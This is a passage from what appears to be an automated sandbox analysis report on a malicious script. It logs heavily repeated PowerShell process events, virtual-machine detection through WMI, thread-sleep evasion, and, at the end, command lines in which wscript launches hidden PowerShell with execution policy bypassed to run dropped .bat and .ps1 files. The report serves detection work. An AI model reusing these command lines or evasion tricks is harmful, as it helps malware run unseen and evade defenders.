              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              barindex
              Queries memory information (via WMI often done to detect virtual machines)
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_CacheMemory
              Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2358
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 635
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 752
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1647
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1838
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8005
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1411
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8428
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 864
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1936
              Source: C:\Windows\System32\svchost.exe TID: 6980Thread sleep time: -30000s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7356Thread sleep count: 336 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7356Thread sleep count: 2358 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7356Thread sleep count: 635 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6000Thread sleep count: 752 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6000Thread sleep count: 1647 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2012Thread sleep count: 1838 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2012Thread sleep count: 8005 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7568Thread sleep time: -3689348814741908s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7628Thread sleep count: 1411 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7628Thread sleep count: 8428 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4376Thread sleep time: -2767011611056431s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7008Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7008Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6872Thread sleep count: 864 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2488Thread sleep count: 1936 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4672Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6776Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6604Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile Volume queried: C:\Windows\SysWOW64 FullSizeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information queried: ProcessInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Yara detected Powershell decode and execute
              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\1Q5Mu4aI.ps1, type: DROPPED
              Bypasses PowerShell execution policy
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -executionpolicy bypass -WindowStyle hidden -c "cmd /q /cC:\Users\user\AppData\Roaming\1Q5Mu4aI.bat"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -executionpolicy bypass -WindowStyle hidden -c "cmd /q /cC:\Users\user\AppData\Roaming\1Q5Mu4aI.bat"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /q /cC:\Users\user\AppData\Roaming\1Q5Mu4aI.bat
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -executionpolicy bypass -WindowStyle hidden -file "C:\Users\user\AppData\Roaming\1Q5Mu4aI.ps1"
